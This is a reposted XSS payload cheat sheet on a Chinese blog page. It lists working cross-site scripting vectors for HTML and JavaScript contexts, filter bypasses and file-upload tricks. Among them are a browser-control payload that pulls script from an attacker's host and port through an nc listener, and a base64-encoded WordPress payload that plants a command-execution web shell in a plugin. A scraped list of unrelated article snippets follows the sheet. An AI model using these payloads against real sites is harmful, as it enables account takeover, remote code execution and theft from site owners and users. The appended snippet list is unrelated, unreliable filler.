xss Payload
来自某牛的网站:http://www.cnblogs.com/b1gstar/p/5783848.html
Basic and advanced exploits for XSS proofs and attacks.
Work in progress, bookmark it.
Technique | Vector/Payload * | ||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
* In URLs: | & => %26 , # => %23 , + => %2B | ||||||||||||||||||
HTML Context Tag Injection |
<svg οnlοad=alert(1)> "><svg οnlοad=alert(1)// |
||||||||||||||||||
HTML Context Inline Injection |
"οnmοuseοver=alert(1)// "autofocus/οnfοcus=alert(1)// |
||||||||||||||||||
Javascript Context Code Injection |
'-alert(1)-' '-alert(1)// |
||||||||||||||||||
Javascript Context Code Injection (escaping the escape) |
\'-alert(1)// |
||||||||||||||||||
Javascript Context Tag Injection |
</script><svg οnlοad=alert(1)> |
||||||||||||||||||
PHP_SELF Injection | http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)> | ||||||||||||||||||
Without Parenthesis |
<svg οnlοad=alert`1`> <svg οnlοad=alert(1)> <svg οnlοad=alert(1)> <svg οnlοad=alert(1)> |
||||||||||||||||||
Filter Bypass |
(alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) |
||||||||||||||||||
Body Tag |
<body οnlοad=alert(1)> <body οnpageshοw=alert(1)> <body οnfοcus=alert(1)> <body οnhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x <body οnscrοll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body οnresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) |
||||||||||||||||||
Miscellaneous Vectors |
<marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src οnlοadstart=alert(1)> <video οnlοadstart=alert(1)><source> <input autofocus οnblur=alert(1)> <keygen autofocus οnfοcus=alert(1)> <form οnsubmit=alert(1)><input type=submit> <select οnchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x οnshοw=alert(1)>right click me! |
||||||||||||||||||
Agnostic Event Handlers |
<x contenteditable οnblur=alert(1)>lose focus! <x οnclick=alert(1)>click this! <x οncοpy=alert(1)>copy this! <x οncοntextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x οndblclick=alert(1)>double click this! <x οndrag=alert(1)>drag this! <x contenteditable οnfοcus=alert(1)>focus this! <x contenteditable οninput=alert(1)>input here! <x contenteditable οnkeydοwn=alert(1)>press any key! <x contenteditable οnkeypress=alert(1)>press any key! <x contenteditable οnkeyup=alert(1)>press any key! <x οnmοusedοwn=alert(1)>click this! <x οnmοusemοve=alert(1)>hover this! <x οnmοuseοut=alert(1)>hover this! <x οnmοuseοver=alert(1)>hover this! <x οnmοuseup=alert(1)>click this! <x contenteditable οnpaste=alert(1)>paste here! |
||||||||||||||||||
Code Reuse Inline Script |
<script>alert(1)// <script>alert(1)<!– |
||||||||||||||||||
Code Reuse Regular Script |
<script src=//brutelogic.com.br/1.js> <script src=//3334957647/1> |
||||||||||||||||||
Filter Bypass |
|
||||||||||||||||||
Generic Source Breaking |
<x onxxx=alert(1) 1=' |
||||||||||||||||||
Browser Control |
<svg οnlοad=setInterval(function(){with(document)body. appendChild(createElement('script')).src='//HOST:PORT'},0)> $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done |
||||||||||||||||||
Multi Reflection |
|
||||||||||||||||||
Without Event Handlers |
<script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click <math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/onload=alert(1)>> <svg><script xlink:href=data:,alert(1) /> <math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> |
||||||||||||||||||
Mobile Only |
|
||||||||||||||||||
Generic Self to Regular XSS |
<iframe src=LOGOUT_URL οnlοad=forms[0].submit()> </iframe><form method=post action=LOGIN_URL> <input name=USERNAME_PARAMETER_NAME value=USERNAME> <input name=PASSWORD_PARAMETER_NAME value=PASSWORD> |
||||||||||||||||||
File Upload |
Injection in Filename "><img src=1 οnerrοr=alert(1)>.gif Injection in Metadata Injection with SVG File Injection with GIF File as Source of Script (CSP Bypass) |
||||||||||||||||||
Google Chrome |
<script src="data:,alert(1)// "><script src=data:,alert(1)// <script src="//brutelogic.com.br/1.js# <link rel=import href="data:text/html,<script>alert(1)</script> |
||||||||||||||||||
PHP File for XHR Remote Call |
<?php header(“Access-Control-Allow-Origin: *”); ?> <img src=1 οnerrοr=alert(1)> |
||||||||||||||||||
Server Log Avoidance |
<svg οnlοad=eval(URL.slice(-8))>#alert(1) <svg οnlοad=eval(location.hash.slice(1)>#alert(1) <svg οnlοad=innerHTML=location.hash>#<script>alert(1)</script> |
||||||||||||||||||
Shortest PoC |
<base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done |
||||||||||||||||||
Portable Wordpress RCE |
<script/src="data:,eval(atob(location.hash.slice(1)))//# #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD Qp4LnNlbmQoJCk= http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD |
NOTICE: A special version of this cheat sheet (with private stuff) is available to@brutalsecrets followers here (check pass on timeline).
#hack2learn
转载于:https://www.cnblogs.com/nuomin/p/7063750.html
xss Payload相关推荐
- Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...
- 终极万能XSS Payload
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload.就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS paylo ...
- xss payload大全
刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...
- 常用 XSS Payload
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaS ...
- xss payload收集
打开xss之js,我们随意输入然后查看页内原码. 我们输入tmac 复制全文 我们尝试造成闭合,我们尝试造成闭合,输入x'</script><script>alert(docu ...
- 无需括号的xss payload
兄弟们,事情是这样的,上周五我不是参加公司的新人训练营吗 可是没想到 糟糕的事情发生在了我身上 这件事情严重影响了我这周的学习与工作 你听我慢慢给你讲 由于疫情原因,这次的训练营只能在室内进行,约定的 ...
- 【网络安全】XSS盲打实战案例:某网页漫画
什么是XSS盲打 简单来说,盲打就是在一切可能的地方尽可能多的提交XSS语句,然后看哪一条会被执行,就能获取管理员的Cooike.趁着没过期赶紧用了,这样就能直接管理员进后台.然后再上传一句话,Get ...
- OpenRASP xss算法的几种绕过方法
openrasp默认只能检测反射型XSS,存储型XSS仅IAST商业版支持.对于反射型xss,openrasp也只能检测可控输出点在html标签外的情况,本文的绕过方法是针对这种情况.如果可控输出点在 ...
- XSSFORK:新一代XSS自动扫描测试工具(精)
什么是XSS漏洞呢 ? XSS(Cross-site scripting)译为跨站脚本攻击,在日常的web渗透测试当中,是最常见的攻击方法之一,并占有很高的地位.它是通过对网页注入可执行代码且成功地被 ...
最新文章
- 破冰接入云信,打造陌生人游戏社交APP
- 计数 APP android,SharedPreferences初学~个人备忘录以及对进入APP的次数进行计数
- 【Python】高级函数
- Atiitt 提升复用性之道 项目成本之道 Atitit 代码复用的理解attilax总结 1. 复用分类	1 1.1. 类库侧重代码重用,框架侧重设计重用	2 2. 文档与索引体系	2 3
- android期末课设选题_Android课程设计报告书.doc
- 查看oracle建表语句
- python ppt教程_python pptx复制指定页的ppt教程
- 山西省太原市、运城市、大同等市全面推行建筑工地劳务实名制
- 支持人脸识别的相册PhotoPrism
- 三日济州岛,何以韩国人眼光?-让自己慢下来(43)
- 骑士游历问题——至少需要多少步
- Flex弹性盒子(一篇带你掌握潮流 Flex 布局)
- 微信公众号图文中怎么下载封面图?
- 利用Python在环境气象海洋领域实现基础计算与绘图
- 张赐荣 | PHP 获取喜马拉雅音频直链地址
- 人造金刚石 量子计算机,金刚石并非坚不可摧:科研小组创造首个量子计算机桥...
- solidwork放置螺丝孔以及显示螺纹的问题
- 化繁为简,这家企业如何撬动千亿美元物联网服务大市场
- 第十章 PL/SQL对象类型 ( 1 )
- 長井志江:AI模拟并协助自闭症患者,探究人类认知与意识本质|42问AI与机器人未来...
热门文章
- Java对象序列化详解
- 火狐浏览器mac_Firefox火狐浏览器73.0版本发布,有哪些期待已久的新功能?
- datatables 无法 无法重新初始化datatable_伽巫塔罗:2020年9月运势占卜,摩羯没了热情,无法重新卡死...
- 手机linux系统指令大全,Linux系统指令大全
- java 手动编译打包_Maven 手动添加第三方依赖包及编译打包和java命令行编译JAVA文件并使用jar命令打包...
- macbookpro合盖后掉电_macbookpro外接显示器,主机盖还是不盖?
- 【科普】从HTTP到HTTP/3的发展简史
- 新一代容器平台ACK Anywhere,来了
- 从零入门 Serverless | Serverless 应用如何管理日志 持久化数据
- O'Reilly 1500 份问卷调研:2019 年 Serverless 落地到底香不香?